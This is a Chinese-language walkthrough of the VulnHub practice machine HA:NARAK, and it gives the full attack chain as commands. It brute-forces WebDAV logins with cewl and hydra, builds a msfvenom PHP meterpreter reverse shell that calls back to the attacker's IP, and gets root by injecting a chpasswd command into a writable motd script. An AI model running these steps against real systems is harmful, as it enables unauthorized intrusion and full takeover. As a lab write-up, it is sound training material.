VulnHub渗透测试实战靶场-HA:NARAK

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub渗透测试实战靶场-HA:NARAK相关的知识,希望对你有一定的参考价值。

环境下载

HA:NARAK靶机搭建

  • 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.140
  • 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.246.140sudo nmap -sU -Pn 192.168.246.140,发现开放了 22、68、69、80 四个端口
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.140

漏洞挖掘

  • 访问 192.168.246.140/webdav 发现需要用户名和密码进行登录,使用 cewl 生成 worldlist 后利用 hydra 进行爆破,得到一组用户名和密码:yamdoot:Swarg
cewl http://192.168.246.140 -w wordlist.txt

hydra -L wordlist.txt -P wordlist.txt -f -V 192.168.246.140 http-get /webdav

getshell

  • 搜索 webdav 相关漏洞利用方式后发现可以 cadaver 执行 put 命令来上传一个 shell
  • 使用 msfvenom 生成反弹 shell 的木马或者直接利用 Kali 自带的 webshell,将木马上传上去,访问该木马即可接收到反弹 shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.246.129 LPORT=1234 R > shell.php

提权

  • 翻阅信息,在 /mnt 下发现一个文件 hell.sh,查看该文件发现一串 Brainfuck 编码,解码后得到 chitragupt
  • 尝试利用 chitragupt 作为密码,利用 Home 目录下的用户进行登录
  • 用 python 起一个 http 服务,将 linpeas.sh 上传到目标靶机,并给 linpeas.sh 加上权限
  • 运行 linpeas.sh,发现 /etc/update-motd.d/ 目录下部分文件可写入
  • 修改 etc/update-motd.d/00-header 文件,将 root 的密码修改掉
echo "echo 'root:d1no' | sudo chpasswd" >> 00-header
  • 重新登录 ssh,使写入的内容执行,成功拿到 root 权限

以上是关于VulnHub渗透测试实战靶场-HA:NARAK的主要内容,如果未能解决你的问题,请参考以下文章

VulnHub渗透测试实战靶场-HA: FORENSICS

Vulnhub靶场渗透-narak

VulnHub渗透测试实战靶场 - Odin:1

VulnHub渗透测试实战靶场 - Funbox: Lunchbreaker

VulnHub渗透测试实战靶场 - NULLY CYBERSECURITY: 1

VulnHub渗透测试实战靶场 - FUNBOX: CTF